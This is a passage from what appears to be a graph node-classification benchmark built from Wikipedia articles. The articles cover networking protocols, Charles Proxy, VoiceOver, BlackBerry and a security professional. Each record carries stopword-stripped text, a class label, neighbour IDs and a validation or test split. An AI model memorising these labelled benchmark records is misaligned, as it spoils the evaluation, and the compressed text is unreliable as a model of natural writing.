    "text": "Alastair_MacWillson:alastair macwillson dr. alastair carmichael macwillson british cyber security professional macwillson chair institute information security professionals qufaro founding director cambridge analytica additionally principal chertoff group macwillson spent 16 years british foreign service working technical political risk analysis former ussr middle east united states dr. alastair carmichael macwillson british intelligence security cyber security professional macwillson chair institute information security professionals qufaro founding director cambridge analytica additionally principal chertoff group macwillson referenced spending 16 years british foreign service working technical political risk analysis former ussr middle east united states however cover real job officer mi6 direct recruit sis university oldfield chief initially specialised terrorist threat northern ireland 1980 posted senior intelligence officer oman research department internal security service staffed several senior sis gchq personnel director operations 1989 time worked cia establishing joint us/uk rapid deployment force combat terrorist events late 1989 returned uk 1990 published hmg sanctioned book entitled hostage taking terrorism since 1990 macwillson roving hq brief problem solver alleged set special operations group within sis 10 hostage taking terrorism dr. alastair macwillson published 1991 mcmillan 11 cambride analytica",
    "neighbors": [
      2202,
      691
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2203,
    "label": 5,
    "text": "Selective_Repeat_ARQ:selective repeat arq selective repeat arq/selective reject arq specific instance automatic repeat-request arq protocol used solve sequence number dilemma communications selective repeat part automatic repeat-request arq selective repeat sender sends number frames specified window size even without need wait individual ack receiver go-back-n arq receiver may selectively reject single frame may retransmitted alone contrasts forms arq must send every frame point receiver accepts out-of-order frames buffers sender individually retransmits frames timed may used protocol delivery acknowledgement message units may used protocol delivery subdivided message sub-units used protocol delivery messages sending process continues send number frames specified window size even frame loss unlike go-back-n arq receiving process continue accept acknowledge frames sent initial error general case sliding window protocol transmit receive window sizes greater 1 receiver process keeps track sequence number earliest frame received sends number every acknowledgement ack sends frame sender reach receiver sender continues send subsequent frames emptied window receiver continues fill receiving window subsequent frames replying time ack containing sequence number earliest missing frame sender sent frames window re-sends frame number given acks continues left size sending receiving windows must equal half maximum sequence number assuming sequence numbers numbered 0 n −1 avoid miscommunication cases packets dropped understand consider case acks destroyed receiving window larger half maximum sequence number possibly even packets present timeouts duplicates recognized sender moves window every packet acknowledged used protocol delivery subdivided messages works somewhat differently non-continuous channels messages may variable length standard arq hybrid arq protocols may treat message single unit alternately selective retransmission may employed conjunction basic arq mechanism message first subdivided sub-blocks typically fixed length process called packet segmentation original variable length message thus represented concatenation variable number sub-blocks standard arq message whole either acknowledged acked negatively acknowledged naked arq selective transmission ack response would additionally carry bit flag indicating identity sub-block successfully received arq selective retransmission sub-divided messages retransmission diminishes length needing contain sub-blocks linked channel models variable length messages probability error-free reception diminishes inverse proportion increasing message length words easier receive short message longer message therefore standard arq techniques involving variable length messages increased difficulty delivering longer messages repeat full length selective re-transmission applied variable length messages completely eliminates difficulty delivering longer messages successfully delivered sub-blocks retained transmission number outstanding sub-blocks following transmissions diminishes selective repeat implemented udp transmission transmission control protocol uses variant go-back-n arq ensure reliable transmission data internet protocol provide guaranteed delivery packets selective acknowledgement sack extension may also use selective repeat arq itu-t g.hn standard provides way create high-speed 1 gigabit/s local area network using existing home wiring power lines phone lines coaxial cables uses selective repeat arq ensure reliable transmission noisy media g.hn employs packet segmentation sub-divide messages smaller units increase probability one received correctly stanag 5066 profile hf radio data communications uses selective repeat arq maximum window size 128 protocol-data units pdus",
    "neighbors": [
      2752,
      5472,
      1154,
      10924,
      5071,
      2640,
      4691,
      2772,
      4918
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2204,
    "label": 9,
    "text": "Name_collision:name collision term name collision refers nomenclature problem occurs computer programs variable name used different things two separate areas joined merged otherwise go occupying separate namespaces sharing one collision identifiers must resolved way new software mashup work right problems name collision methods avoid common issue introductory level analysis computer languages c++ term name collision used computer science three decades referring names various classification systems several techniques avoiding name collisions including use tactics used resolve name collisions",
    "neighbors": [
      2936,
      5059,
      1724,
      8262
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2205,
    "label": 4,
    "text": "Charles_Proxy:charles proxy charles web debugging proxy cross-platform http debugging proxy server application written java enables user view http https http/2 enabled tcp port traffic accessed via local computer includes requests responses including http headers metadata e.g cookies caching encoding information functionality targeted assisting developers analyze connections messaging charles autoconfigure use following browsers",
    "neighbors": [
      64,
      9440,
      1064,
      10924,
      461,
      5677,
      6797,
      7983,
      4725,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 2206,
    "label": 5,
    "text": "IS-IS:is-is intermediate system intermediate system is-is also written isis routing protocol designed move information efficiently within computer network group physically connected computers similar devices accomplishes determining best route data packet-switched network is-is protocol defined iso/iec 10589:2002 international standard within open systems interconnection osi reference design internet engineering task force ietf republished is-is rfc 1142 rfc later marked historic rfc 7142 republished draft rather final version iso standard causing confusion is-is called de facto standard large service provider network backbones is-is interior gateway protocol designed use within administrative domain network contrast exterior gateway protocols primarily border gateway protocol bgp used routing autonomous systems rfc 1930 is-is link-state routing protocol operating reliably flooding link state information throughout network routers is-is router independently builds database network topology aggregating flooded network information like ospf protocol is-is uses dijkstra algorithm computing best path network packets datagrams forwarded based computed ideal path network destination is-is protocol developed digital equipment corporation part decnet phase v. standardized iso 1992 iso 10589 communication network devices termed intermediate systems opposed end systems hosts iso purpose is-is make possible routing datagrams using iso-developed osi protocol stack called clns is-is developed roughly time internet engineering task force ietf developing similar protocol called ospf is-is later extended support routing datagrams internet protocol ip network layer protocol global internet version is-is routing protocol called integrated is-is rfc 1195 is-is open shortest path first ospf link state protocols use dijkstra algorithm computing best path network result conceptually similar support variable length subnet masks use multicast discover neighboring routers using hello packets support authentication routing updates ospf natively built route ip layer 3 protocol runs top ip is-is osi layer 2 protocol layer connectionless network protocol clnp widespread adoption ip may contributed ospf popularity is-is use ip carry routing information messages ospf version 2 hand designed ipv4 is-is neutral regarding type network addresses route allowed is-is easily used support ipv6 operate ipv6 networks ospf protocol rewritten ospf v3 specified rfc 2740 ospf is-is routers build topological representation network map indicates subnets is-is router reach lowest-cost shortest path subnet used forward traffic is-is differs ospf way areas defined routed is-is routers designated level 1 intra-area level 2 inter area level 1–2 routing information exchanged level 1 routers level 1 routers area level 2 routers form relationships exchange information level 2 routers level 1–2 routers exchange information levels used connect inter area routers intra area routers ospf areas delineated interface area border router abr actually two areas effectively creating borders areas inside abr whereas is-is area borders routers designated level 2 level 1–2 result is-is router ever part single area is-is also require area 0 area zero backbone area inter-area traffic must pass logical view ospf creates something spider web star topology many areas attached directly area zero is-is contrast creates logical topology backbone level 2 routers branches level 1–2 level 1 routers forming individual areas is-is also differs ospf methods reliably floods topology topology change information network however basic concepts similar ospf larger set extensions optional features specified protocol standards however is-is easier expand use type-length-value tlv data allows engineers implement support new techniques without redesigning protocol example order support ipv6 is-is protocol extended support additional tlvs whereas ospf required new protocol draft ospfv3 addition is-is less chatty scale support larger networks given set resources is-is support routers area ospf contributed is-is isp-scale protocol tcp/ip implementation known integrated is-is dual is-is described rfc 1195 is-is also used control plane ieee 802.1aq shortest path bridging spb spb allows shortest-path forwarding ethernet mesh network context utilizing multiple equal cost paths permits spb support large layer 2 topologies fast convergence improved use mesh topology combined single point provisioning logical connectivity membership is-is therefore augmented small number tlvs sub-tlvs supports two ethernet encapsulating data paths 802.1ad provider bridges 802.1ah provider backbone bridges spb requires state machine substantive changes is-is simply requires new network layer protocol identifier nlpid set tlvs extension is-is defined ietf proposed standard rfc 6329",
    "neighbors": [
      10752,
      1030,
      8211,
      6681,
      5149,
      9245,
      10271,
      10274,
      2085,
      562,
      3126,
      1079,
      3133,
      11332,
      9285,
      8265,
      1610,
      9290,
      4691,
      10344,
      9860,
      3218,
      11413,
      5270,
      8854,
      152,
      3742,
      9381,
      3751,
      3752,
      172,
      10413,
      686,
      10924,
      9909,
      5816,
      7865,
      4797,
      7360,
      7364,
      8904,
      8421,
      8426,
      8432,
      5875,
      6403,
      9987,
      3847,
      9992,
      1297,
      10005,
      5402,
      11036,
      5405,
      5413,
      11056,
      7478,
      10238,
      5437,
      5439,
      6977,
      835,
      2887,
      1867,
      8524,
      2904,
      5978,
      5469,
      5470,
      5472,
      1893,
      11112,
      1391,
      3447,
      2431,
      6544,
      5021,
      1955,
      8627,
      2996,
      3006,
      4543,
      3529,
      11210,
      2509,
      2519,
      4058,
      3036,
      4064,
      5614,
      1010,
      2045,
      5118
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2207,
    "label": 2,
    "text": "VoiceOver:voiceover voiceover screen reader built apple inc. macos ios tvos watchos ipod operating systems using voiceover user access macintosh ios device based spoken descriptions case mac keyboard feature designed increase accessibility blind low-vision users well users dyslexia voiceover first introduced mac os x 10.4 target users difficulty reading due vision impairment particularly blind preview also made available mac os x 10.3 panther titled spoken interface preview voiceover treats user interface hierarchy elements navigated various keystrokes elements also interacted with—for example interacting text box allows reading text possible editing interacting scroll bar allows moved using keyboard voiceover also includes support many braille displays blind deaf addition voiceover includes features use mouse keyboard-based navigation users macbooks magic trackpads number special multitouch features also available trackpad respond gestures much like ios version voiceover specific example using trackpad explore actual visual layout elements screen sliding one finger around trackpad activate elements mac os x 10.5 apple added alex voice offered improved quality speech human-like sound previously voices directly descended used apple speech manager originated early 1990s also alex voice natural breathing unlike voices apple mac os x 10.7 apple offered download realspeak voices nuance use voiceover accessibility inspector made verify accessibility os x applications displays information gui element currently cursor success macs apple added voiceover ipod shuffle assists users ipod shuffle controlling playback songs titles read 2010 revision ipod shuffle user also voiceover read playlists unlike voiceover os x voiceover marketed accessibility feature ipod shuffle voiceover intended used everyone disabled months later release iphone 3gs voiceover added ios ipod touch upgraded match hardware iphone 3gs ipod touch third generation also gained voiceover capability ipad since introduction also voiceover capability voiceover ios interacts user using various gestures different motions one makes one fingers display many gestures location-sensitive—for example sliding one finger around screen reveal visual contents screen finger passes enables blind users explore actual on-screen layout application user double-tap—similar double-clicking mouse—to activate selected element sighted user tapped item voiceover also turn display leave touch screen sensitive touch saving battery power apple calls feature screen curtain also available mac computers running os x. voiceover ios activated using settings application found accessibility section general section device also configured voiceover toggled triple-click home button device september 2009 apple launched feature ipod nano line uses many gestures ios version",
    "neighbors": [
      10755,
      9732,
      4615,
      1549,
      5647,
      7697,
      1042,
      11289,
      6186,
      4139,
      6700,
      4657,
      1074,
      8754,
      9784,
      8253,
      576,
      9802,
      8783,
      5713,
      4180,
      3670,
      1623,
      3672,
      4184,
      10838,
      2141,
      4702,
      3681,
      9826,
      2149,
      8806,
      3691,
      8303,
      2673,
      6771,
      2676,
      6264,
      7292,
      2686,
      6783,
      7806,
      9343,
      10878,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      5784,
      1177,
      4251,
      3228,
      1699,
      11430,
      171,
      5292,
      8877,
      1710,
      2735,
      3248,
      3766,
      2232,
      9912,
      4283,
      3772,
      7869,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      3286,
      9430,
      3289,
      3293,
      4318,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      2288,
      7928,
      8441,
      7420,
      7422,
      11521,
      2819,
      1796,
      1290,
      3338,
      9999,
      784,
      10512,
      4888,
      5912,
      11037,
      10023,
      811,
      3371,
      4399,
      7983,
      10036,
      7991,
      9529,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      4933,
      838,
      7496,
      9035,
      1878,
      4957,
      6495,
      9063,
      4457,
      10602,
      3948,
      10608,
      2439,
      6023,
      6539,
      7052,
      9100,
      9109,
      3483,
      1439,
      2979,
      9123,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      3533,
      6093,
      7118,
      464,
      8662,
      9174,
      3035,
      4571,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      10221,
      7154,
      5619,
      11257,
      7163,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 2208,
    "label": 2,
    "text": "BlackBerry:blackberry blackberry line smartphones tablets services originally designed marketed canadian company blackberry limited formerly known research motion rim currently designed manufactured marketed tcl communication brand blackberry mobile bb merah putih optiemus infracom global indonesian south asian markets respectively using blackberry brand license blackberry one prominent smartphone vendors world specializing secure communications mobile productivity well-known keyboards devices peak september 2013 85 million blackberry subscribers worldwide however blackberry since lost dominant position market due success android ios platforms numbers fallen 23 million march 2016 blackberry line traditionally uses proprietary operating system developed blackberry limited known blackberry os 2013 blackberry introduced blackberry 10 major revamp platform based qnx operating system blackberry 10 meant replace aging blackberry os platform new system line user experiences modern smartphone operating systems first bb10 powered device blackberry z10 followed all-touch keyboard-equipped models including blackberry q10 blackberry classic blackberry z30 stereo speakers blackberry passport blackberry leap 2015 blackberry re-focused business strategy began release android-based smartphones beginning blackberry priv slider blackberry dtek50 september 28 2016 blackberry announced would cease designing phones favor licensing partners tcl communication became global licensee brand name blackberry mobile optiemus infracom name blackberry mobile india bb merah putih also serve licensees brand serving indian indonesian markets respectively february 2017 blackberry mobile released blackberry keyone known physical keyboard 4.5 inch screen great battery life last device designed blackberry limited blackberry mobile latest android smartphone blackberry key2 officially announced june 7 2018 released july 13th year us devices along bb merah purih blackberry aurora make blackberry current lineup june 2018 blackberry key2 launched international markets india licensee optiemus infracom key2 first blackberry-branded smartphone sport dual camera setup incorporates features portrait mode optical zoom august 2018 launch blackberry key2 optiemus infracom announced launch evolve evolve x smartphones indian market sold exclusively amazon india smartphones conceptualized designed manufactured india evolve series officially announced august 2 2018 research motion rim founded waterloo ontario first developed inter ctive pager 900 announced september 18 1996 inter ctive pager 900 clamshell-type device allowed two-way paging success 900 inter ctive pager 800 created ibm bought us 10 million worth february 4 1998 next device released inter ctive pager 950 august 26 1998 first device carry blackberry name blackberry 850 email pager released january 19 1999 although identical appearance 950 850 first device integrate email name inter ctive pager longer used brand device first blackberry device 850 introduced 1999 two-way pager munich germany name blackberry coined marketing company lexicon branding name chosen due resemblance keyboard buttons drupelets compose blackberry fruit original blackberry devices rim 850 857 used datatac network 2002 commonly known convergent smartphone blackberry released supports push email mobile telephone text messaging internet faxing web browsing wireless information services blackberry gained market share mobile industry concentrating email blackberry began offer email service non-blackberry devices palm treo proprietary blackberry connect software original blackberry device monochrome display newer models installed color displays newer models optimized thumbing use thumbs type keyboard storm 1 storm 2 include suretype keypad typing originally system navigation achieved use scroll wheel mounted right side device models prior 8700 trackwheel replaced trackball introduction pearl series allowed four-way scrolling trackball replaced optical trackpad introduction curve 8500 series models made use iden networks nextel southernlinc nii holdings mike also incorporate push-to-talk ptt feature similar two-way radio january 30 2013 blackberry announced release z10 q10 smartphones models consist touch screens z10 features all-touch design q10 combines qwerty keyboard touchscreen features second financial quarter 2013 blackberry sold 6.8 million handsets eclipsed sales competitor nokia lumia model first time august 12 2013 blackberry announced intention sell company due increasingly unfavourable financial position competition mobile industry largely due lower expected sales z10 blackberry announced september 20 2013 4,500 full- part-time positions estimated 40 operating staff terminated product line reduced six four models september 23 2013 fairfax financial owns 10 equity stake blackberry made offer acquire blackberry 4.7 billion 9.00 per share following announcement blackberry announced acceptance offer provisionally would continue seek offers november 4 2013 november 4 2013 blackberry replaced thorsten heins new interim ceo john s. chen former ceo sybase november 8 blackberry board rejected proposals several technology companies various blackberry assets grounds break-up serve interest stakeholders include employees customers suppliers addition shareholders said sources want identified discussions confidential november 13 2013 chen released open message committed reclaiming success early july 2014 techcrunch online publication published article titled blackberry one hottest stocks 2014 seriously following 50 percent rise company stock increase greater peer companies apple google however analysis blackberry financial results showed neither revenue profit margin improved instead costs markedly reduced period blackberry also introduced new passport handset — consisting square screen full hd-class 1,440 x 1,440 resolution marketed professional fields healthcare architecture — promoted messenger app released minor updates bb10 mobile operating system december 17 2014 blackberry classic introduced meant line former bold series incorporating navigation buttons similar previous blackberry os devices discontinued june 2016 last blackberry keyboard dominates front phone classic style september 2015 blackberry officially unveiled blackberry priv slider german made camera lens 18 megapixels phablet utilizes android operating system additional security productivity-oriented features inspired blackberry operating systems however blackberry coo marty beard told bloomberg company never said would build another bb10 device july 26 2016 company hinted another model physical keyboard coming shortly day blackberry unveiled mid-range android model on-screen keyboard blackberry dtek50 powered latest version android 6.0 marshmallow priv could also upgraded 6.0 device featured 5.2-inch full high-definition display blackberry chief security officer david kleidermacher stressed data security launch indicating model included built-in malware protection encryption user information industry observers pointed dtek50 re-branded version alcatel idol 4 additional security-oriented software customizations manufactured designed tcl september 2016 blackberry limited agreed licensing partnership indonesian company set new joint venture company called bb merah putih source distribute market blackberry handsets indonesia october 25 2016 blackberry released blackberry dtek60 second device dtek series manufactured designed tcl device features 5.5-inch quad-hd touch screen display running qualcomm snapdragon 820 processor support quick charge 3.0 usb type-c fingerprint sensor october 2016 announced blackberry working ford motor company canada develop software car manufacturer connected vehicles february 2017 20m class action lawsuit blackberry announced former employees company march 2017 bb merah putih announced blackberry aurora indonesian-made sold device running operating system based android 7.0 box march 2018 announced blackberry working jaguar land rover develop software car manufacturer vehicles june 2018 blackberry partnership tcl mobile optiemus infracom launched key2 global launch new york third device sport keyboard running google android os 2000 ntp sent notice wireless email patents number companies offered license patents ntp brought patent-infringement lawsuit one companies research motion united states district court eastern district virginia court well known strict adherence timetables deadlines sometimes referred rocket docket particularly efficient trying patent cases jury eventually found ntp patents valid furthermore jury established rim infringed patents willful manner infringement cost ntp us 33 million damages greater reasonable royalty lost profits judge james r. spencer increased damages us 53 million punitive measure due willful nature infringement also instructed rim pay ntp legal fees us 4.5 million issued injunction ordering rim cease desist infringing patents—this decision would resulted closure blackberry systems us rim appealed findings court injunction remedies stayed pending outcome appeals march 2005 appeal rim ntp tried negotiate settlement dispute settlement 450 million negotiations broke due issues june 10 2005 matter returned courts early november 2005 us department justice filed brief requesting rim service allowed continue large number blackberry users us federal government january 2006 us supreme court refused hear rim appeal holding liability patent infringement matter returned lower court prior granted injunction preventing rim sales us use blackberry device might enforced presiding district court judge two parties unable reach settlement february 9 2006 us department defense dod filed brief stating injunction shutting blackberry service excluding government users unworkable dod also stated blackberry crucial national security given large number government users february 9 2006 rim announced developed software workarounds would infringe ntp patents would implement injunction enforced march 3 2006 stern warning judge spencer rim ntp announced settled dispute terms settlement rim agreed pay ntp 612.5 million usd full final settlement claims statement rim said terms agreement finalized litigation rim dismissed court order afternoon agreement eliminates need court proceedings decisions relating damages injunctive relief settlement amount believed low analysts absence future royalties technology question may 26 2017 blackberry announced reached agreement qualcomm incorporated resolving amounts payable connection interim arbitration decision announced april 12 2017 following joint stipulation parties arbitration panel issued final award providing payment qualcomm blackberry total amount u.s. 940,000,000 including interest attorneys fees net certain royalties due blackberry calendar 2016 first quarter calendar 2017 november 24 2010 research motion rim removed kik messenger blackberry app world limited functionality software users rim also sued kik interactive patent infringement misuse trademarks october 2013 companies settled lawsuit terms undisclosed 2018 reported blackberry would filing legal action facebook perceived intellectual property infringements within facebook messenger whatsapp well instagram many blackberry retail stores operate outside north america thailand indonesia united arab emirates mexico december 2007 blackberry store opened farmington hills michigan store offers blackberry device models t-mobile verizon sprint major u.s. carriers offer smartphones three prior attempts opening blackberry stores toronto london uk eventually folded also blackberry stores operated wireless giant airports atlanta boston charlotte minneapolis–st paul philadelphia houston newark several slated closing september 23 2015 blackberry opened first pop-up store frankfurt germany various stages company history suffered occasional service outages referred media embarrassing 2005 company suffered relatively short-term outage reportedly among small handful north america carriers service restored several hours 2007 e-mail service suffered outage led calls questioning integrity towards blackberry perceived centralized system 2009 company outage reportedly covering whole north america 2011-10-10 10:00 utc began multi-day outage europe middle east africa affecting millions blackberry users another outage following day october 12 2011 blackberry internet service went north america research motion attributed data overload due switch failures two data centres waterloo canada slough england cause service disruptions outage intensified calls shareholders shake-up company leadership estimates blackberry company lost 50 million 54 million due global email service failure outage 2011 bcesa blackberry certified enterprise sales associate qualification first three levels professional blackberry certification information certifications blackberry.com website blackberry technical certifications available android devices blackberry 10 devices blackberry 7 devices blackberry 6 devices blackberry 5 devices blackberry 4 devices blackberry 3 devices blackberry 2 devices blackberry 1 devices modern lte based phones blackberry z10 qualcomm snapdragon s4 plus proprietary qualcomm soc based armv7-a architecture featuring two 1.5 ghz qualcomm krait cpu cores 400 mhz adreno 225 gpu gsm-based blackberry phones incorporate arm 7 9 11 processor blackberry models torch 9850/9860 torch 9810 bold 9900/9930 1.2 ghz msm8655 snapdragon s2 soc 768 mb system memory 8 gb on-board storage entry-level models curve 9360 feature marvell pxa940 clocked 800 mhz previous blackberry devices bold 9000 equipped intel xscale 624 mhz processors bold 9700 featured newer version bold 9000 processor clocked speed curve 8520 featured 512 mhz processor blackberry 8000 series smartphones 8700 pearl based 312 mhz arm xscale armv5te pxa900 exception blackberry 8707 based 80 mhz qualcomm 3250 chipset due pxa900 chipset supporting 3g networks 80 mhz processor blackberry 8707 meant device often slower download render web pages 3g 8700 edge networks early blackberry devices blackberry 950 used intel 80386-based processors blackberry latest flagship phone blackberry z30 based 5-inch super amoled 1280×720 resolution 295 ppi 24-bit color depth powered quad-graphics qualcomm dual core 1.7 ghz msm8960t pro first blackberry android operating system released late november 2015 192 gram/6.77 ounce blackberry priv launched version 5.1.1 later upgraded version 6.0 android marshmallow first available four countries increased 31 countries february 28 2016 employing qualcomm 8992 snapdragon 808 hexa-core 64 bit adreno 418 600 mhz gpu 3gb ram processor unit equipped curved 5.4-inch 2560 x 1440 oled display sliding qwerty keyboard hidden use google voice recognition allows dictating e-mails also available priv retained best blackberry 10 features 3,410mah battery said provide 22.5 hours mixed use 18-megapixel camera schneider-kreuznach lens also record 4k video secondary selfie camera also provided several important apps unique priv available google play mid december new operating system blackberry 10 released two new blackberry models z10 q10 january 30 2013 blackberry world 2012 rim ceo thorsten heins demonstrated new features os including camera able rewind frame-by-frame separately individual faces image allow selection best different shots stitched seamlessly optimal composite intelligent predictive adapting keyboard gesture based user interface designed around idea peek flow apps available blackberry 10 devices blackberry world storefront previous operating system developed older blackberry devices blackberry os proprietary multitasking environment developed rim operating system designed use input devices track wheel track ball track pad os provides support java midp 1.0 wap 1.2 previous versions allowed wireless synchronisation microsoft exchange server email calendar well lotus domino email os 5.0 provides subset midp 2.0 allows complete wireless activation synchronisation exchange email calendar tasks notes contacts adds support novell groupwise lotus notes blackberry curve 9360 blackberry torch 9810 bold 9900/9930 curve 9310/9320 torch 9850/9860 featured 2011 blackberry os 7 apps available devices blackberry world 2013 called blackberry app world third-party developers write software using apis proprietary blackberry apis well application makes use certain restricted functionality must digitally signed associated developer account rim signing procedure guarantees authorship application guarantee quality security code rim provides tools developing applications themes blackberry applications themes loaded onto blackberry devices blackberry world air ota blackberry mobile browser blackberry desktop manager blackberry devices well android ios windows phone platforms ability use proprietary blackberry messenger also known bbm software sending receiving encrypted instant messages voice notes images videos via blackberry pin long cell phone data plan messages free charge features bbm include groups bar-code scanning lists shared calendars bbm music integration apps games using bbm social platform april 2013 blackberry announced shutting streaming music service bbm music active almost two years since launch blackberry messenger music closed june 2 2013 july 2014 blackberry revealed blackberry assistant new feature blackberry os 10.3 blackberry passport hardware feature digital personal assistant help keep organized informed productive december 2014 blackberry nanthealth healthcare-focused data provider launched secure cancer genome browser giving doctors ability access patients genetic data blackberry passport smartphone several non-blackberry mobile phones released featuring blackberry email client connects blackberry servers many phones full qwerty keyboards third-party software available use blackberry devices includes full-featured database management systems used support customer relationship management clients applications must manage large volumes potentially complex data march 2011 rim announced optional android player could play applications developed android system would available blackberry playbook rim first entry tablet market august 24 2011 bloomberg news reported unofficial rumors blackberry devices would able run android applications rim brings qnx android app player blackberry october 20 2011 rim officially announced android applications could run unmodified blackberry tablet newest blackberry phones using newest version operating system blackberry smartphones integrated organization email system software package called blackberry enterprise server bes version 5 blackberry enterprise service bes version 10 versions 6 9. versions bes available microsoft exchange lotus domino novell groupwise google apps individual users may able use wireless provider email services without install bes organizations multiple users usually run bes network blackberry devices running blackberry os 10 later also managed directly microsoft exchange server using exchange activesync eas policies way ios android device eas supports fewer management controls bes third-party companies provide hosted bes solutions every blackberry unique id called blackberry pin used identify device bes blackberry one time provided free bes software called bes express besx primary bes feature relay email corporate mailbox blackberry phone bes monitors user mailbox relaying new messages phone via blackberry network operations center noc user wireless provider feature known push email new emails contacts task entries memopad entries calendar entries pushed blackberry device immediately opposed user synchronising data manually device poll server intervals blackberry also supports polling email third-party applications messaging system built blackberry understands receive messages bes bis services handle connections user mail providers device storage also enables mobile user access data off-line areas without wireless service user reconnects wireless service bes sends latest data feature newer models blackberry ability quickly track user current location trilateration without use gps thus saving battery life time trilateration used quick less battery intensive way provide location-aware applications co-ordinates user however accuracy blackberry trilateration less gps due number factors including cell tower blockage large buildings mountains distance bes also provides phones tcp/ip connectivity accessed component called mds mobile data system connection service allows custom application development using data streams blackberry devices based sun microsystems java platform addition bes provides network security form triple des recently aes encryption data email mds traffic travels blackberry phone blackberry enterprise server providers offer flat monthly pricing via special blackberry tariffs unlimited data blackberry units bes addition receiving email organizations make intranets custom internal applications unmetered traffic recent versions blackberry platform mds longer requirement wireless data access starting os 3.8 4.0 blackberry phones access internet i.e tcp/ip access without mds – formerly email wap access possible without bes/mds bes/mds still required secure email data access applications require wap carriers allow wap access primary alternative using blackberry enterprise server use blackberry internet service bis blackberry internet service available 91 countries internationally blackberry internet service developed primarily average consumer rather business consumer service allows users access pop3 imap outlook web app via exchange activesync email accounts without connecting blackberry enterprise server bes blackberry internet service allows 10 email accounts accessed including proprietary well public email accounts gmail outlook yahoo aol blackberry internet service also supports push capabilities various blackberry applications various applications developed rim blackberry utilise push capabilities bis instant messaging clients like google talk windows live messenger yahoo messenger mms pin interactive gaming mapping trading applications require data plans like bis wi-fi use service usually provisioned mobile phone service provider though blackberry actually runs service blackberry pin personal identification number eight-character hexadecimal identification number assigned blackberry device pins changed manually device though blackberry technicians able reset update pin server-side locked specific blackberry blackberry devices message using pin directly using blackberry messenger application blackberry pins tracked blackberry enterprise servers blackberry internet service used direct messages blackberry device emails messages blackberry push service typically directed blackberry device pin message routed rim network operations center sent carrier deliver message last mile device september 2012 rim announced blackberry pin would replaced users blackberry id starting 2013 launch blackberry 10 platform primary competitors blackberry android smartphones iphone blackberry struggled compete market share plunged since 2011 leading speculation unable survive independent going concern however managed maintain significant positions markets despite market share loss global basis number active blackberry subscribers increased substantially years example fiscal period apple iphone first released rim reported subscriber base 10.5 million blackberry subscribers end 2008 android first hit market rim reported number blackberry subscribers increased 21 million finally quarter ended june 28 2012 rim announced number blackberry subscribers reached 78 million globally release apple iphone 5 september 2012 rim ceo thorsten heins announced current global subscribers 80 million sparked 7 jump shares price however since blackberry global user base meaning active accounts declined dramatically since peak 80 million june 2012 dropping 46 million users september 2014 market share globally also declined less 1 percent 2011 blackberry shipped 43 smartphones indonesia april 2014 fallen 3 decline indonesian market share mirrors global trend company 0.6 north america retail price 2,199,000 indonesian rupiah 189 failed give blackberry boost needed indonesia company launched device discounted offer first 1000 purchasers resulted stampede capital several people injured blackberry lost market share indonesia despite launch z3 may 13 2014 new device given worldwide launch city jakarta came back news research motion rim cut hardware production costs outsourcing taiwan-based foxconn group report third quarter 2015 results december 18 2015 company said approximately 700,000 handsets sold 1.9 million quarter 2014 800,000 q2 2015 average sale price per unit 240 315 however continue increase sales new android priv device selling premium price 800 canada example q3 2015 blackberry net loss 89 million u.s. 17 cents per share 15 million net loss three cents per share excluding restructuring charges one-time items revenue slightly year earlier 557 million u.s. vs. 548 million primarily software sales chief executive officer john chen said expects company software business grow 14 percent market time company ready provide sales figures android-based priv handset released weeks earlier four countries time chen offered comment analysts depending priv ... chance could achieve get closer break-even operating profitability overall device business fourth quarter due continuous reduction blackberry users february 2016 blackberry headquarter waterloo canada slashed 35 percent workforce early 2016 blackberry market share dropped 0.2 q4 2016 reports indicate blackberry sold 207,900 units—equivalent 0.0 market share number active blackberry users since 2003 globally research motion agreed give access private communications governments united arab emirates saudi arabia 2010 india 2012 saudi uae governments threatened ban certain services law enforcement agencies could decrypt messages people interest revealed part 2013 mass surveillance disclosures american british intelligence agencies national security agency nsa government communications headquarters gchq respectively access user data blackberry devices agencies able read almost smartphone information including sms location e-mails notes blackberry internet service operates outside corporate networks contrast data passing internal blackberry services bes compresses encrypt data documents stated nsa able access blackberry e-mail system could see read sms traffic brief period 2009 nsa unable access blackberry devices blackberry changed way compress data access devices re-established gchq gchq tool named scrapheap challenge capability perfect spoofing emails blackberry targets response revelations blackberry officials stated us comment media reports regarding alleged government surveillance telecommunications traffic added back door pipeline platform established exist similar access intelligence agencies mobile devices exists using similar techniques hack blackberry software includes support dual ec drbg csprng algorithm due probably backdoored nsa us national institute standards technology strongly recommends longer used blackberry ltd. however issued advisory customers consider probable backdoor vulnerability blackberry ltd. also owns us patent 2007189527 covers technical design backdoor formerly advanced encryption capabilities blackberry smartphone made eligible use government agencies state forces former united states president barack obama became known dependence blackberry device communication 2008 presidential campaign despite security issues insisted using even inauguration seen akin celebrity endorsement marketing experts estimated worth 25 million 50 million usage blackberry continued around end presidency hillary clinton email controversy associated hillary clinton continuing use blackberry assuming office secretary state example west yorkshire police allowed increase presence police officers along streets reduction public spending given officer could perform desk work directly via mobile device well several areas situations us federal government slow move away blackberry platform state department spokesperson saying 2013 blackberry devices still mobile devices approved u.s. missions abroad state department high encryption standard made blackberry smartphones playbook tablet unique since implemented devices including apple devices released iphone 4 bangalore city police one police departments india along pune police kochi police use blackberry devices united kingdom south west trains northern rail issued blackberry devices guards order improve communication control guards passengers canada toronto many municipalities within canada issued blackberry devices employees including limited transportation technical water operations inspection staff management staff order improve communication contracted construction companies winter maintenance operations assist successfully organize multimillion-dollar contracts devices standard mobile device receive e-mail redirected groupwise city e-mail environment currently set support blackberry devices part internet things endeavours company announced plans moving shipping industry adapting smartphones devices communication necessities freight containers eric schmidt executive chairman google longtime blackberry user although smartphones running google android mobile operating system compete blackberry schmidt said 2013 interview uses blackberry prefers keyboard italian criminal group known 'ndrangheta reported february 2009 communicated overseas gulf cartel mexican drug cartel use blackberry messenger since bbm texts difficult intercept",
    "neighbors": [
      9732,
      1930,
      9101,
      9360,
      2449,
      10645,
      278,
      7447,
      7958,
      8472,
